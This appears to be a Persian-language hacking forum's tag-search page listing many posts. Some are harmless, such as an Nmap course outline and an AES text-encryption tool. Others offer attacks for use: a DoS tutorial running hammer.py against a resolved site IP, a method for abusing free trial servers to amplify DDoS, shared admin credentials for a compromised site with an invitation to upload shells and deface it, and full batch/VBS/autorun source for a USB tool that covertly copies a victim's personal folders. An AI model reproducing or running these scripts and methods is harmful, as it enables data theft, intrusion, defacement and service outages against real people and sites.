جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'hack'.
97 نتیجه پیدا شد
-
iot.mp4
-
- یادگیری ماشین
- هک
-
(و 9 مورد دیگر)
برچسب زده شده با :
-
بسم الله الرحمن الرحیم خب دوستان امروز میخوای یک ابزار که پلیس فتا ازش استفاده میکنه رو واستون معرفی کنم این ابزار قدرت بسیار بالایی دارد و موقیت دقیق فرد بدون هیچ خطای سانتی متری رو ردیابی میکنه فیلمش رو پایین واستون میزارم لینک دانلود هم میزارم Rubika: @fice_bodam d63fc353113bfef613441fd89d5853dd7405521-720p.mp4
-
با توجه به درخواست تعداد زیادی از کاربران و پرسش سوالات مکرر در زمینه نحوه استفاده از سرویس Ngrok ویدیویی تهیه کردم تا عزیزان بتوانند با این ویدیو جواب مشکلات خودشون رو بگیرند. ویدیو در محیط کالی انجام شده و یک پیلود آزمایشی جهت تست ایجاد کردم تا از کار کردنش اطمینان پیدا کنید. خوهشا دیگه کسی در این زمینه سوالی در انجمن مطرح نکنه. Ngrok.mp4 سوالات پرتکرار: آیا به Ngrok دسترسی دائمی دارم و میتونم بعد از قطع شدن سرویس بازم از همون پیلود استفاده کنم؟ درحالت عادی نه! ولی با خرید و تهیه سرویس VIP از Ngrok میتوانید از تمام قابلیت های آن استفاده کنید که این آپشن هم جزئی از سرویس ویژه هستش. آیا بعد از وصل شدن Ngrok ممکن است اتصال به سرویس بدون دلیل قطع شود؟ خیر، حتی در سرویس رایگان هم تا وقتی خودتان سرویس را قطع نکنید سرویس مربوطه قطع نمی شود. آیا این سرویس قابل اعتماد است؟ بله، ترافیک اینترنت به صورت کاملا اختصاصی فوروارد میشود و هویت شما مخفی می ماند. آیا پورت فورواردینگ در مودم نیاز است؟ خیر آیا در ایران این سرویس پشتیبانی میشود؟ همیشه نه! جدیدا کاربران از این موضوع که Ngrok فقط با VPN متصل میشه ناراضی هستند. ولی شما میتوانید از تحریم شکن ها استفاده کنید تا مشکلی نداشته باشید. این تاپیک آموزشی است. از ارسال پست خودداری کنید. شاد باشید🌷
-
sql injection آموزش آسیب پذیری Sql Injection (ویدئویی)
MR.MSA پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .- 45 پاسخ
-
- sql injection vulnerability
- اموزش ویدئویی
-
(و 55 مورد دیگر)
برچسب زده شده با :
- sql injection vulnerability
- اموزش ویدئویی
- vulnerability
- site hacking
- اموزش وب هکینگ
- sql injection method
- sql injection bypass
- sql injection ویدئویی
- sqli attack
- باگ بانتی
- هک
- تارگت های تمرینی
- video
- mysql
- polygon
- دیتابیس هکینگ
- وب هکینگ
- database attack
- سرور هکینگ
- هکر
- bug bounty
- باگ
- تارگت
- sqli
- bug
- web hacking
- bug crowd
- waf
- تزریق sql
- database hacking
- آموزش ویدئویی
- sql
- hack
- mr.msa
- bypass
- firewall
- mssql
- like
- cdn
- waf bypassing
- web application firewall
- cloudflare
- اموزش تست و نفوذ
- تارگت sql injection (تست و نفوذ ویدئویی )
- اسیب پذیری های تحت وب
- اسیب پذیری
- اسیب پذیری های سایت
- join
- اموزش هک
- اسیب پذیری sql injection
- اموزش به صورت ویدئویی
- sqli vulnerability
- website vulnerability
- اموزش هک سایت
- اموزش هک سایت با sqli
- اموزش دسترسی به دیتابیس
- اموزش برداشتن دیتابیس یک سایت
-
به نام خدا شب گذشته اکانت شاخ مجازی و دزد پول مردم بار دیگر هک شد به وسیله ی شخصی به نام mr__nking موفق باشید
-
سلام دوستان NMAP در این تاپیک می خوام به شما دوستان عزیز آموزش این ابزار بسیار قدرتمند رو بدم میشه گفت تقریبا تمام هکر ها این ابزار رو میشناسن و ازش استفاده می کنن برای اینکه این تاپیک مثل تاپیک قبل نشه من از همین پست اول قوانین رو میزارم تا باهاشون آشنا باشید قوانین : 1- اگر سوالی داشتید می تونید یا به گارد ایران یا به دیسکرود من پیام بدید 2- اگر پیشنهادی دارید می تونید به گارد ایران یا دیسکورد من پیام بدید 3- اگر قصد دارید در ساخت این دوره به من کمک کنید ابتدا با بنده هماهنگ کنید و سر خود چیزی در این تاپیک ارسال نکنید 4- از اسپم زدن یا رعایت نکردن قوانین انجمن و این تاپیک به شدت خوداری کنید 5-اگر از مطالب تاپیک و دوره راضی بودید می تونید گزینه لایک پایین صفحه سمت چپ رو بزنید در هیچ صورتی برای تشکر نه اسپم بزنید نه پیوی من پیام بدید 6- دوره هر 2 روز یک بار آپدیت میشه صبور باشید - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - سرفصل های اصلی دوره : 1- آشنایی مقدماتی با انمپ 2- آرگومان های کاوش در شبکه 3- آرگومان های پیشرفته انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - لیست زیر شاخه های سرفصل ( آشنایی مقدماتی با انمپ ) : 1- نصب و راه اندازی انمپ بر روی پلتفرم های مختلف 2- آشنایی با محیط و دستورات انمپ 3- اسکن پورت ها 4- جمع آوری اطلاعات با انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - لیست زیر شاخه های سرفصل ( آرگومان های کاوش در شبکه ) : 1- زمان بندی مناسب در انمپ 2- بایپس های امنیتی در انمپ 3- ذخیره اطلاعات دریافت شده با انمپ 4- رفع ارور های انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - لیست زیر شاخه های سرفصل ( آرگومان های پیشرفته انمپ ) : 1- آموزش کار با ابزار زنمپ 2- اسکریپت های انمپ 3- اسکریپت های پیشرفته انمپ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - نکته قابل توجه : هر کدام از زیر شاخه های شامل چند مبحث میشود به دلیل متنی بودن این دوره مجبوریم از بعضی مباحث گذر کنیم اگر دوست دارید در ساخت این دوره به من کمک کنید یا پیشنهادی دارید می توانید به دیسکورد من پیام ارسال کنید
-
سلام دوستان آموزش می خوام ی روش کاربردی بهتون آموزش بدم که در حملات دیداس خیلی کار آمد هست شاید ما اونقدر پهنای باند خوبی برای انجام این حمله نداشته باشیم و موفق به دان کردن سرور نشیم اینجاست که خلاقیت به کار ما میاد اونم این هست که از سرور هایی که داریم کمک بگیریم که شاید بعضی ها سرور نداشته باشن و یا سرورشون برای این کار مناسب نباشه دقیقا این نقطه شروع ی خلاقیت جالبه ما سایت های زیادی رو میبینیم که قبل از اینکه سرور بفروشن اون رو به افراد برای یک روز و تست کردن سرور مجانی میدن حالا ما با استفاده از همین روش پهنای باند خودمون رو بزرگ تر می کنیم خب صحبتش ساده هست اما انجام چجوری هست من برای مثل یک سایت رو بهتون معرفی می کنم [Hidden Content] این سایت برای 30 دقیقه بهتون سرور میده که تستش کنید 30 برای ی هکر خیلی زیاد هم هست تنها کاری که باید کرد اینه که ی ابزار دانلود کنی و ران کنی به همین راحتی چیز جالب تر این هست که بعد از 30 دقیقه سرور از دسترس شما خارج نمیشه و فقط ی صفحه برای شما میاره بالا که میگه اگر سرور رو می خواید ثبت نام کنید و سرور که شما بهش دستور دیداس دادید هم داره کار خودش رو انجام میده من برای نمونه یک فیلم ضبط کردم که می تونید پایین تاپیک مشاهدش کنید فیلم رو ضبط کردم ما به دلیل اینکه حجمش بیشتر از حجم مجاز برای اپلود هستش داخل سایت دیگری اپلودش کردم که می تونید برید و ببینید لینک ویدیو همونطور که در انتهای فیلم دیدید من می تونم هر چندتا سرور که خواستم ازش بگیرم بهتون پیشنهاد می کنم یکی یکی پیش برید یعی یک سرور روی اوکی کنید بعد برید سراغ سرور بعدی سرعت عمل خیلی مهم هستش نکته اخر بعید میدونم nsa.gov به اون راحتی دان شده باشه به احتمال زیاد مشکل از سمت من بود که سایت لود نمیشد
-
سایت برای دیفیس کردن
Zed پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام دوستان من یک سایت رو زدم ولی هر کاری می کنم تو زون اچ ایرانی ثبت نمیشه ارور 500 سرور میده یوزر پسورد رو میزارم می تونید برید به اسم خودتون دیفیس کنید و ثبتش کنید شاید سایت منو بلاک کرده باشه در هر صورت ادرس سایت : [Hidden Content] یوزر : Zed پسورد : HackerZed ادرس پیج ادمین :[Hidden Content]/_admin/ می تونید شل اپ کنید مث دیفیس کنید یا دیفیس هاتون رو تست کنید -
با سلام خدمت دوستان عزیز سایت zone-hc.ir یا همون zone-h ایرانی دوباره راه اندازی شده: [Hidden Content]
-
یکی از پر چالش ترین موضوعات برای یک هکر انتخاب سیستم عامل هست البته در حال حاضر یک تاز میدان Kali Linux هست که واقعا هم سیستم عامل قدرتمندی هست اما امروز اومدم ی سیستم عامل بهتون معرفی کنم کار کردن باهاش برای مبتدی ها هم آسون تر هست هم ابزار های بیشتری داره از همه مهم تر ساخت ایران هستش که خیلی خوب هست البته نیومد یک طرفه به قاضی برم و همش بزنم تو سر لینوکس بله ترمینال لینوکس خیلی خیلی قدرتمند و سریع هستش اما ویندوز هم خوبی های خودش رو داره امروز اومدم با معرفی سیستم عامل black win که سیستم عامل بسیار خوبی هست و تحت ویندوز هستش خب رو ویندوز فوت شاپ نصب میشه گیم نصب میشه کلا هر کاری دوست داری کن ولی لینوکس دهنت سرویس میشه بخوای رو کالی گیم نصب کنی ! در نهایت هم همچیز بستگی به خودم ادم داره که کدوم رو انتخاب می کنه اما پیشنهاد من به شما بلک وین هست تا تاپیک بعدی 👋
- 4 پاسخ
-
- kali
- black arch
- (و 6 مورد دیگر)
-
با سلام خدمت دوستان عزیز در این ویدئو آموزش اتصال دامنه به گیت هاب رو بهتون دادم یادتون نره حتما ویدئو رو لایک و چنل رو ساب کنید. یوتیوب: لینک در اپارات : [Hidden Content]
-
- اتصال دامنه به گیت هاب | github pages
- github
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز شاید قبلا Guardiran Exploit Database رو جز خدمات Mr.MSA دیده باشید: اما از الان به بعد برای این پروژه یک دامین جدید گرفتم و به پروژه جدا تبدیل شد: exploit-db.ga نکات مهم درمورد این سیستم: ۱- این سیستم کلا از خدمات MR.MSA جدا میشه ولی از طرفی یکی از خدمات و پروژه های من هست! ۲- دامین تا یک سال تمدیده. ۳- پروژه که php بود رو html کردم. ۴- سورس در گیتهاب موجود میباشد. ۵- اکسپلویت های بخش vip انجمن قرار داره. لینک گیت هاب موفق و پایدار باشید.
-
- اکسپلویت های انجمن تیم امنیتی گاردایران
- اکسپلویت
- (و 12 مورد دیگر)
-
msa service خدمات MR.MSA | ورژن 1.8 | ورژن 2 به زودی
MR.MSA پاسخی ارسال کرد برای یک موضوع در تارگت های تمرینی
MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش : R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz ورژن 1.4.0 رونمایی می کند : mr-msa.xyz ورژن 1.5.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .- 8 پاسخ
-
- msacms tools
- بلودیت
-
(و 79 مورد دیگر)
برچسب زده شده با :
- msacms tools
- بلودیت
- wordpress xss
- wordpress 5.5
- cms security
- ssrf
- bug privet
- تایپو ۳
- mr-msa.xyz
- جوملا
- rfi
- sql injection
- وردپرس
- sqli
- typo3 cms
- bug crowd
- bug bounty
- csrf
- تمرین تست نفوذ و یادگیری cms ها
- wordpress
- joomla
- msacms
- آزمایشگاه تحلیل باگ
- cms
- shell
- آزمایشگاه تست نفوذ
- uploader
- آموزش cms
- web application bug
- madesimple
- bug
- bludit
- cms typo3
- باگ
- lfi rfi
- webapplication hacking
- rfu
- bludit cms
- msacms+
- concrete5
- cms bludit
- cmsmadesimple
- sql injention
- تست امنیت
- waf
- upload
- upload shell
- wordpress them
- database mysql
- firewall
- باگ پرایوت و مکان ازمایشگاهی با msacms | ورژن 1.5.0
- آزمایشگاه
- .xyz
- سیستم مدیریت محتوا
- wordpress 5.5.3
- mr-msa
- hack
- waf bypassing
- امنیت
- typo3
- program
- php
- tools
- web security
- دروپال
- rce
- web application firwall
- اموزش
- web application security
- lfi
- mr.msa
- xss
- drupal
- .cf
- wordpress 5.6
- security
- web design
- web developer
- html
- css
- js
-
سلا م . ظهرتون بدون باگ . امروز میخوام درباره حمله داس و دیداس صحبت کنم این دو حمله یکی از معروف ترین حمله های سایبری بین هکر ها هستش . خوب حالا این دوتا اتک چی هستن و چه کاری انجام میدن ؟ این اتک ها هدفشون در اصل خارج کردن سرویس دهی اون میزبان به کاربران هست تا کابران نتونن با اون سایت کار کنن و کاراشون انجام بدن -- توضیح -- در این اتک هکر با ارسال درخواست های مکرر به سرور و یا کامپیوتر باعث اختلال سرور یا کامپیوتر می شوند ... خب در حمله اول که به اسم داس هستش یک کامپیوتر به یک سرور یا کامپیوتر درخواست هارو ارسال میکنه و باعث اختلال میشه (در این حمله تاثیری زیادی بر سرور نمیزاره و برا تارگت های خیلی کوچیک خوبه مثل مودم ها و روتر و..) در حمله دوم دیداس چند کامپیوتر به یک سرور خیلی بزرگ حمله میکنند و درخواست های زیادی از پورت های مختلفی به سرور می فرستند تا اون سرور از کار بیفته . در حمله دیداس خیلی قوی تر هستش و کامپیوتر های بیشتر در این حمله هستن شاید بیشتر بالای ۱۰۰ ۲۰۰ نفر آدم و خیلی خیلی بیشتر در این حمله ها سرور اف می شود و حتی در بعضی اوقات باعث صدمات فیزیکی به سرور هم می شوند .. آموزش اتک داس در کالی لینوکس : ابزار مورد نیاز : 1-nslookup 2-python3 3-hammer.py برای نصب این سه ابزار میتواند با استفاده از apt-get یا apt در کالی لینوکس ان هارا دریافت کنید به جز hammer.py نصب کردید ؟ بریم برای آموزش .. خب اول از همه باید ایپی سایت رو در بیاریم با nslookup که این نیاز به روت نداره ولی کسایی که همیشه تو روت هستن هم میتونن ازش استفاده کنن خب .. برا بدست اوردن ایپی nslookup رو مینویسم و در جلو اون سایت مورد نظر رو مینویسم و در قسمت Address ایپی مورد نظر سایتمون هستش .. بعد از اون اسکریپت اتک رو از سایت GitHub دانلود میکنیم از طریق git clone در ترمینال لینک دانلود : hammer.py بعد از دانلود اسکریپت . پوشه اسکرپیت رو با cd ha,mmer انتخاب میکنیم . بعد از اون با کد python3 hammer.py -s ip -p -t اتک رو شروع میکنیم در قسمت < ip > ایپی مورد نظرمون رو وارد میکنیم بعد از p- پورتی که اتک میخوایم رو بدیم میزاریم ( پورت دیفالت خودش ۸۰ هست ) و بعد از t- سرعت اتک رو وارد میکنیم ( سرعت دیفالت خودش ۱۳۵ هست) و بعد از وارد کردن همه اینا اتک شروع میشه و در اتمام کیل شدن رو مینویسه و به معنی اتمام هستش . خوش و خرم باشید . از این مطاب در راه درستش استفاده کنیم به امید قویتر شدن ایران در امنیت سایبری ( با اینکه خودش در حال حاضر قویترینه) خدانگهدار
-
کپی اطلاعات از ویندوز
backpack پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
سلام دوستان. در این تاپیک می خوام نحوه ساخت ویروسی برای کپی اطلاعات به صورت فیزیکی اون هم بدون اطلاع تارگت را قرار بدم. (شاید تو خیلی فیلم ها دیده باشید) برای انجام تمیز و کامل شما نیاز به چهار فایل دارید(فقط یکی از فایل ها ضروری است و بقیه فایل ها برای به جا نگذاشتن رد است) به علت خطرناک نبودن فایل ها برای سیستم، آنتی ویروس ها کاری به فایل های ما ندارن. ساخت فایل اصلی برای ساخت ویروس می توانید از یک تکست ادیتور ساده مثل Notepad استفاده کنید، کد زیر را داخل یک فایل bat قرار دهید و نام آن را file.bat بگذارید (حتما فایل را با فرمت .bat ذخیره کنید.) :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y /g echo off %backupcmd% "%USERPROFILE%\Desktop" "%drive%\SRX\Desktop" %backupcmd% "%USERPROFILE%\pictures" "%drive%\SRX\My pics" %backupcmd% "%USERPROFILE%\Documents" "%drive%\SRX\Documents" %backupcmd% "%USERPROFILE%\Favorites" "%drive%\SRX\Favorites" %backupcmd% "%USERPROFILE%\videos" "%drive%\SRX\vids" %backupcmd% "%USERPROFILE%\Download" "%drive%\SRX\Download" %backupcmd% "%USERPROFILE%\Music" "%drive%\SRX\Music" %backupcmd% "%USERPROFILE%\OneDrive" "%drive%\SRX\OneDrive" %backupcmd% "%USERPROFILE%\3D Objects" "%drive%\SRX\3D Objects" %backupcmd% "%USERPROFILE%\Contacts" "%drive%\SRX\Contacts" @echo off مخفی سازی هنگام اجرا برای مخفی کردن فایل هنگام اجرا نیاز به دو فایل دارید. فایل اول دوباره Notepad را باز کنید و فایلی با عنوان invisible.vbs بسازید و کد زیرا داخل آن قرار دهید. (حتما فایل را با فرمت .vbs -مخفف ویبیاسکریپت- ذخیره کنید) CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False فایل دوم مجددا Notepad را باز کنید و یک فایل .bat دیگر بسازید و کد زیر را درونش قرار دهید. می توانید نام فایل را launcher.bat بگذارید. wscript.exe "%drive%\invisible.vbs" "%drive%\file.bat" نکته: یک فایل دیگر هم هست که فقط زمانی کاربرد که ویندوز تارگت شما 7 یا کمتر از 7 باشد.البته بهتر است این فایل هم کنار فایل هایتان داشته باشید چون اگر اجرا شود خیلی می تواند در روند کار به شما کمک کند. در غیر این صورت شما نیازمند این فایل نیستید و می توانید از آن صرف نظر کنید. استفاده از Autorun Notepad را باز کنید و فایلی با عنوان autorun.inf درست کنید و کد زیر را درونش قرار دهید. [autorun] open=launcher.bat تمام فایل ها را درون هارد یا فلشتون منتقل کنید (ترجیحا از چیزی با حافظه ذخیره سازی بالا مثل هارد استفاده کنید تا مشکل کمبود فضا نداشته باشید) اگر تارگت شما از ویندوز 7 به پایین استفاده می کرد شما فقط باید هارد یا فلشتون رو به سیستم متصل کنید. اما اگر تارگت از ویندوز 8 ، 8.1 یا 10 استفاده می کرد باید خیلی سریع و به صورت مخفیانه فایل launcher.bat رو اجرا کنید. (می توانید از مهندسی اجتماعی برای انجام کار استفاده کنید) اطلاعاتی که کپی می شود را می توانید به محض اجرای فایل در پوشه ای با نام SRX مشاهده کنید. امیدوارم که استفاده کافی رو برده باشد🌹- 4 پاسخ
-
- windows hacking
- hack
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز انجمن . در این تاپیک براتون cms های اختصاصی وب سایت ها رو قرار میدم . تاپیک ها رو لایک کنید تا cms ها زودتر قرار بگیرند . روش کار : شما ابتدا فایل zip رو دانلود میکنید که برای هر cms هست و در کنارش یک فایل db.sql هم قرار میدم که دیتابیس اون سایت هست و کافیه فایل ها رو توی هاست یا لوکال هاست قرار بدید و کوئری ها sql رو توی phpmyadmin اجرا کنید و در نهایت اتصال به دیتابیس و کار تمومه . قوانین تاپیک : سوالاتتون رو در بخش سوال و جواب بپرسید . تاپیک اسپم ارسال نکنید و برای تشکر از دکمه کنار تاپیک استفاده کنید . قبل از ارسال تاپیک در اینجا بنده رو در جریان بزارید . موفق و پیروز باشید .
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک یک رمزنگاری و رمزگشایی متن رو با برنامه Autoit نوشتم میتونید استفاده کنید سورس کدها و فیلم آموزشی نحوه ی استفاده را قرار میدم ;Code By rvlocker ;;;;;;;;guardiran.org #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Icon=..\Downloads\defend-encryption-cyan-1_0.ico #AutoIt3Wrapper_UseX64=n #AutoIt3Wrapper_Res_Comment=Code by rvlocker --> This is a program for text encryption #AutoIt3Wrapper_Res_Description=Text encryption #AutoIt3Wrapper_Run_Au3Stripper=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include <Crypt.au3> #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <TabConstants.au3> #include <WindowsConstants.au3> #Region ### START Koda GUI section ### Form= Global $Form1 = GUICreate("EnCrypt Text ! code by---> rvlocker", 570, 256, 302, 173) GUISetBkColor(0x008000) Global $Tab1 = GUICtrlCreateTab(8, 0, 553, 249) Global $enCryptText = GUICtrlCreateTabItem("EnCrypt") Global $Edit1 = GUICtrlCreateEdit("", 48, 32, 265, 73) GUICtrlSetData(-1, "") Global $Button1 = GUICtrlCreateButton("SetPassword", 328, 48, 121, 33) GUICtrlSetFont(-1, 8, 400, 0, "Broadway") GUICtrlSetColor(-1, 0x800000) GUICtrlSetBkColor(-1, 0x00FFFF) Global $Edit2 = GUICtrlCreateEdit("", 48, 136, 265, 73) GUICtrlSetData(-1, "") Global $Button2 = GUICtrlCreateButton("Encrypt", 328, 160, 121, 33) GUICtrlSetFont(-1, 8, 400, 0, "Elephant") GUICtrlSetColor(-1, 0x800080) GUICtrlSetBkColor(-1, 0x99B4D1) Global $deCryptText = GUICtrlCreateTabItem("DeCrypt") Global $Edit3 = GUICtrlCreateEdit("", 48, 40, 265, 73) GUICtrlSetData(-1, "") Global $Button3 = GUICtrlCreateButton("YourPassword", 328, 56, 121, 33) GUICtrlSetFont(-1, 8, 800, 0, "Sitka Text") GUICtrlSetColor(-1, 0x0000FF) GUICtrlSetBkColor(-1, 0x800080) Global $Edit4 = GUICtrlCreateEdit("", 48, 136, 265, 73) GUICtrlSetData(-1, "") Global $Button4 = GUICtrlCreateButton("DeCrypt", 328, 152, 121, 33) GUICtrlSetFont(-1, 8, 800, 0, "Ravie") GUICtrlSetColor(-1, 0x008080) Global $Help = GUICtrlCreateTabItem("Help") Global $Label1 = GUICtrlCreateLabel("Hello, to use the program", 144, 32, 219, 22) GUICtrlSetFont(-1, 11, 400, 2, "Showcard Gothic") GUICtrlSetColor(-1, 0xFF0000) GUICtrlSetBkColor(-1, 0xFFFFFF) Global $Label2 = GUICtrlCreateLabel("first enter your password ", 128, 56, 248, 24) GUICtrlSetFont(-1, 12, 400, 2, "Showcard Gothic") GUICtrlSetBkColor(-1, 0xFFFFFF) Global $Label3 = GUICtrlCreateLabel("guardiran.org", 136, 160, 253, 30) GUICtrlSetFont(-1, 16, 400, 0, "Wide Latin") GUICtrlSetColor(-1, 0x00FF00) GUICtrlSetBkColor(-1, 0xFFFFFF) Global $Label4 = GUICtrlCreateLabel("and then your text for encryption", 112, 96, 289, 22) GUICtrlSetFont(-1, 11, 400, 0, "Showcard Gothic") GUICtrlSetColor(-1, 0xFF00FF) GUICtrlSetBkColor(-1, 0xFFFFFF) GUICtrlCreateTabItem("") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button1 Global $PasswordFromUser1 = GUICtrlRead($Edit1) Case $Button2 Global $TextFromUser1 = GUICtrlRead($Edit2) $encData = _Crypt_EncryptData($TextFromUser1,$PasswordFromUser1,$CALG_AES_256) MsgBox(64,"",$encData) $saveLocation = FileSaveDialog("Encrypt File ",@ScriptDir,"Text Files (*.txt)",16) FileWrite($saveLocation,$encData) Case $Button3 Global $PasswordFromUser2 = GUICtrlRead($Edit3) Case $Button4 $deCryptData = _Crypt_DecryptData($encData,$PasswordFromUser2,$CALG_AES_256) MsgBox(64,"",BinaryToString($encData)) $saveLocation2 = FileSaveDialog("Decrypt File ",@ScriptDir,"Text Files (*.txt)",16) FileWrite($saveLocation2,$deCryptData) EndSwitch WEnd در تاپیک های بعدی برنامه های بیشتری قرار خواهم داد rvlocker.mp4 دانلود فایل ---->> دانلود از github برای آموزش های بیشتر به دیسکورد گاردایران مراجعه فرمایید با تشکر
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت دوستان عزیز تیم انجمن گاردایران در این تاپیک یک spammer رو کدنویسی کردم امیدوارم لذت ببرید ! توجه : سرعت انتقال پیام به وسیله ی شما بسیار بالاست این برنامه صرفا برای آشنایی شماست لطفا از استفاده ی این برنامه دقت فرمایید ! اگر به این برنامه علاقه مند بودید میتونید نظرتونو اعلام کنید تا تایمرهای پیشرفته برای این spammer قرار بدم همچنین اگر علاقه مند به زمینه ی تولید بات برای هر نوع گیمی بودید در همین تاپیک اعلام کنید تا بات مورد نظر را قرار بدم بسیار خب بریم سراغ کد نویسی👽 :----->> ابتدا قبل از کدنویسی باید فرم هارو تشکیل داد بدین صورت -->> Global Const $GUI_EVENT_CLOSE = -3 $Form1 = GUICreate("Code By Mr_Zero", 493, 115, 349, 270) Global $Edit1 = GUICtrlCreateEdit("", 72, 0, 337, 113) Global $Button1 = GUICtrlCreateButton("Save", 0, 0, 75, 113) GUICtrlSetFont(-1, 14, 800, 0, "MS Sans Serif") GUICtrlSetColor(-1, 0x008000) GUICtrlSetBkColor(-1, 0xFFFF00) Global $Button2 = GUICtrlCreateButton("Stop", 407, -2, 83, 113) 